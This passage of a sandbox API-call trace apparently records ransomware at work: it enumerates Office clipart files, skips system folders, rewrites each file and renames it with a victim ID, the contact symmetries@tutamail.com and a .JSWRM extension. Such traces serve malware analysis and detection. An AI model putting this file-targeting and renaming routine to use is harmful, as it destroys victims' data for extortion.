dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.090] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x45b0) returned 0x24d210 [0080.091] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x45b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x45b0, lpOverlapped=0x0) returned 1 [0080.096] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.096] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x45b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x45b0, lpOverlapped=0x0) returned 1 [0080.096] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0080.096] CloseHandle (hObject=0x314) returned 1 [0080.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0080.096] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0080.097] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0080.097] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0080.097] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0080.097] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0080.097] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0080.097] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0080.097] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0080.097] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0080.097] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0080.097] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0080.097] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0080.097] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0080.097] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099204.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099204.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099204.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099204.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0080.097] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0080.097] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0080.097] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0080.098] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe5dee50, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe5dee50, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe605048, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x45be, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0099205.WMF", cAlternateFileName="")) returned 1 [0080.098] lstrcmpiW (lpString1="J0099205.WMF", lpString2=".") returned 1 [0080.098] lstrcmpiW (lpString1="J0099205.WMF", lpString2="..") returned 1 [0080.098] lstrcmpiW (lpString1="J0099205.WMF", lpString2="...") returned 1 [0080.098] lstrcmpiW (lpString1="J0099205.WMF", lpString2="windows") returned -1 [0080.098] lstrcmpiW (lpString1="J0099205.WMF", lpString2="recovery") returned -1 [0080.098] lstrcmpiW (lpString1="J0099205.WMF", lpString2="perflogs") returned -1 [0080.098] lstrcmpiW (lpString1="J0099205.WMF", lpString2="documents and settings") returned 1 [0080.098] lstrcmpiW (lpString1="J0099205.WMF", lpString2="$RECYCLE.BIN") returned 1 [0080.098] lstrcmpiW (lpString1="J0099205.WMF", lpString2="system volume information") returned -1 [0080.098] lstrcmpiW (lpString1="J0099205.WMF", lpString2="msocache") returned -1 [0080.098] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0080.098] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099205.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.098] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099205.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099205.WMF", lpUsedDefaultChar=0x0) returned 12 [0080.098] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0080.098] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0080.098] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099205.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.098] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099205.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099205.WMF", lpUsedDefaultChar=0x0) returned 12 [0080.098] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0080.098] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0080.098] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0080.098] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0080.098] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0080.098] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0080.098] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099205.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099205.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0080.099] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=17854) returned 1 [0080.099] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.099] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x45b0) returned 0x24d210 [0080.099] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x45b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x45b0, lpOverlapped=0x0) returned 1 [0080.113] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.113] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x45b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x45b0, lpOverlapped=0x0) returned 1 [0080.113] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0080.113] CloseHandle (hObject=0x314) returned 1 [0080.113] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0080.113] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0080.113] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0080.113] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0080.113] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0080.113] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0080.113] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0080.113] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0080.113] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0080.113] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0080.113] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0080.113] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0080.113] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0080.114] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0080.114] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099205.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099205.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099205.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099205.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0080.114] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0080.114] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0080.114] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0080.114] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe5dee50, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe5dee50, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe605048, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x133f8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0101856.BMP", cAlternateFileName="")) returned 1 [0080.114] lstrcmpiW (lpString1="J0101856.BMP", lpString2=".") returned 1 [0080.114] lstrcmpiW (lpString1="J0101856.BMP", lpString2="..") returned 1 [0080.114] lstrcmpiW (lpString1="J0101856.BMP", lpString2="...") returned 1 [0080.114] lstrcmpiW (lpString1="J0101856.BMP", lpString2="windows") returned -1 [0080.114] lstrcmpiW (lpString1="J0101856.BMP", lpString2="recovery") returned -1 [0080.115] lstrcmpiW (lpString1="J0101856.BMP", lpString2="perflogs") returned -1 [0080.115] lstrcmpiW (lpString1="J0101856.BMP", lpString2="documents and settings") returned 1 [0080.115] lstrcmpiW (lpString1="J0101856.BMP", lpString2="$RECYCLE.BIN") returned 1 [0080.115] lstrcmpiW (lpString1="J0101856.BMP", lpString2="system volume information") returned -1 [0080.115] lstrcmpiW (lpString1="J0101856.BMP", lpString2="msocache") returned -1 [0080.115] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0080.115] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0101856.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.115] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0101856.BMP", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0101856.BMP", lpUsedDefaultChar=0x0) returned 12 [0080.115] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0080.115] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0080.115] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0101856.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.115] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0101856.BMP", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0101856.BMP", lpUsedDefaultChar=0x0) returned 12 [0080.115] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0080.115] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0080.115] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0080.115] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0080.115] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0080.115] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0080.115] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101856.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101856.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0080.116] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=78840) returned 1 [0080.116] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.116] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x133f0) returned 0x24d210 [0080.116] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x133f0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x133f0, lpOverlapped=0x0) returned 1 [0080.123] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.123] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x133f0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x133f0, lpOverlapped=0x0) returned 1 [0080.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0080.124] CloseHandle (hObject=0x314) returned 1 [0080.124] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0080.124] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0080.124] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0080.124] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0080.124] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0080.124] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0080.124] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0080.124] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0080.124] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0080.124] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0080.124] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0080.124] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0080.125] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0080.125] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0080.125] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101856.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101856.bmp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101856.BMP.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101856.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0080.125] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0080.125] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0080.125] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0080.125] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe5dee50, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe5dee50, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe605048, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7db8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0101857.BMP", cAlternateFileName="")) returned 1 [0080.125] lstrcmpiW (lpString1="J0101857.BMP", lpString2=".") returned 1 [0080.125] lstrcmpiW (lpString1="J0101857.BMP", lpString2="..") returned 1 [0080.125] lstrcmpiW (lpString1="J0101857.BMP", lpString2="...") returned 1 [0080.125] lstrcmpiW (lpString1="J0101857.BMP", lpString2="windows") returned -1 [0080.125] lstrcmpiW (lpString1="J0101857.BMP", lpString2="recovery") returned -1 [0080.125] lstrcmpiW (lpString1="J0101857.BMP", lpString2="perflogs") returned -1 [0080.125] lstrcmpiW (lpString1="J0101857.BMP", lpString2="documents and settings") returned 1 [0080.126] lstrcmpiW (lpString1="J0101857.BMP", lpString2="$RECYCLE.BIN") returned 1 [0080.126] lstrcmpiW (lpString1="J0101857.BMP", lpString2="system volume information") returned -1 [0080.126] lstrcmpiW (lpString1="J0101857.BMP", lpString2="msocache") returned -1 [0080.126] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0080.126] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0101857.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.126] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0101857.BMP", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0101857.BMP", lpUsedDefaultChar=0x0) returned 12 [0080.126] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0080.126] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0080.126] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0101857.BMP", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.126] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0101857.BMP", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0101857.BMP", lpUsedDefaultChar=0x0) returned 12 [0080.126] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0080.126] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0080.126] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0080.126] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0080.126] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0080.126] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0080.126] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101857.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101857.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0080.127] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=32184) returned 1 [0080.127] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7db0) returned 0x24d210 [0080.128] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x7db0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x7db0, lpOverlapped=0x0) returned 1 [0080.214] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.214] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x7db0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x7db0, lpOverlapped=0x0) returned 1 [0080.215] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0080.216] CloseHandle (hObject=0x314) returned 1 [0080.216] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0080.216] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0080.216] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0080.216] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0080.216] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0080.216] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0080.216] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0080.216] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0080.216] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, 